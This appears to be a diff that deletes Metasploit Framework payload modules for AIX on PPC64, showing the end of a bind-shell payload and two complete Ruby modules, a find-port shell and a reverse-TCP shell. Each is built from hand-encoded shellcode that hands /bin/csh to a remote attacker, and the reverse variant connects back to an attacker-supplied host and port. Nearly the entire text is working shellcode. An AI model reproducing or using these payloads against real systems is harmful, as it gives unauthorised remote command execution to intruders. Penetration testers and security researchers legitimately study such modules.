"\x40\x80\xff\xd4" +# bge <bndsockcode+160> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <bndsockcode+208> #
"\x7f\x08\x02\xa6" +# mflr r24 #
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"/bin/csh"
end
end

View File

@ -1,115 +0,0 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/find_port'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'AIX Command Shell, Find Port Inline',
'Version' => '$Revision$',
'Description' => 'Spawn a shell on an established connection',
'Author' => 'Ramon de Carvalho Valle <ramon[at]risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'aix',
'Arch' => ARCH_PPC64,
'Handler' => Msf::Handler::FindPort,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'CPORT' => [ 106, 'n' ],
},
}
))
register_options(
[
OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]),
], self.class)
end
def generate
case datastore['AIXLEVEL']
when '5.3.0'
cal_getpeername = "\x38\x5d\xfe\x7b" # cal r2,-389(r29) #
cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) #
cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) #
cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) #
end
payload =
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
"\x40\x82\xff\xfd" +# bnel <fndsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) #
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
"\x44\xff\xff\x02" +# svca 0 #
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
"\x3b\xa0\x01\xff" +# lil r29,511 #
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
"\x3b\x7d\xfe\x2d" +# cal r27,-467(r29) #
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
"\x7c\x3b\x0b\x78" +# mr r27,r1 #
"\x3b\xff\x01\xff" +# cal r31,511(r31) #
"\x3b\xff\xfe\x02" +# cal r31,-510(r31) #
"\x7f\x65\xdb\x78" +# mr r5,r27 #
"\x7f\x84\xe3\x78" +# mr r4,r28 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
cal_getpeername +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x3b\x5c\x01\xff" +# cal r26,511(r28) #
"\xa3\x5a\xfe\x03" +# lhz r26,-509(r26) #
"\x28\x1a\x04\xd2" +# cmpli 0,r26,1234 #
"\x40\x82\xff\xd4" +# bne <fndsockcode+64> #
"\x3b\x3d\xfe\x03" +# cal r25,-509(r29) #
"\x7f\x23\xcb\x78" +# mr r3,r25 #
cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x25\xcb\x78" +# mr r5,r25 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
"\x40\x80\xff\xd4" +# bge <fndsockcode+116> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <fndsockcode+164> #
"\x7f\x08\x02\xa6" +# mflr r24 #
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"/bin/csh"
end
end

View File

@ -1,113 +0,0 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
module Metasploit3
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'AIX Command Shell, Reverse TCP Inline',
'Version' => '$Revision$',
'Description' => 'Connect back to attacker and spawn a command shell',
'Author' => 'Ramon de Carvalho Valle <ramon[at]risesecurity.org>',
'License' => MSF_LICENSE,
'Platform' => 'aix',
'Arch' => ARCH_PPC64,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'Payload' =>
{
'Offsets' =>
{
'LHOST' => [ 32, 'ADDR' ],
'LPORT' => [ 30, 'n' ],
},
}
))
register_options(
[
OptString.new('AIXLEVEL', [ true, "AIX Level", "5.3.0" ]),
], self.class)
end
def generate
case datastore['AIXLEVEL']
when '5.3.0'
cal_socket = "\x38\x5d\xfe\x8e" # cal r2,-370(r29) #
cal_connect = "\x38\x5d\xfe\x8f" # cal r2,-369(r29) #
cal_close = "\x38\x5d\xfe\xa1" # cal r2,-351(r29) #
cal_kfcntl = "\x38\x5d\xff\x43" # cal r2,-189(r29) #
cal_execve = "\x38\x5d\xfe\x06" # cal r2,-506(r29) #
end
payload =
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <cntsockcode> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
"\x3b\xde\xfe\x25" +# cal r30,-475(r30) #
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"\xff\x02\x04\xd2" +# .long 0xff0204d2 #
"\x7f\x00\x00\x01" +# .long 0x7f000001 #
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
"\x44\xff\xff\x02" +# svca 0 #
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
"\x3b\xa0\x01\xff" +# lil r29,511 #
"\x38\x9d\xfe\x02" +# cal r4,-510(r29) #
"\x38\x7d\xfe\x03" +# cal r3,-509(r29) #
cal_socket +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
"\x38\xbd\xfe\x11" +# cal r5,-495(r29) #
"\x38\x9e\xff\xf8" +# cal r4,-8(r30) #
cal_connect +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x3b\x7d\xfe\x03" +# cal r27,-509(r29) #
"\x7f\x63\xdb\x78" +# mr r3,r27 #
cal_close +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x7f\x65\xdb\x78" +# mr r5,r27 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7f\x83\xe3\x78" +# mr r3,r28 #
cal_kfcntl +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x21" +# bctrl #
"\x37\x7b\xff\xff" +# ai. r27,r27,-1 #
"\x40\x80\xff\xd4" +# bge <cntsockcode+100> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel <cntsockcode+148> #
"\x7f\x08\x02\xa6" +# mflr r24 #
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
cal_execve +
"\x7f\xc9\x03\xa6" +# mtctr r30 #
"\x4e\x80\x04\x20" +# bctr #
"/bin/csh"
end
end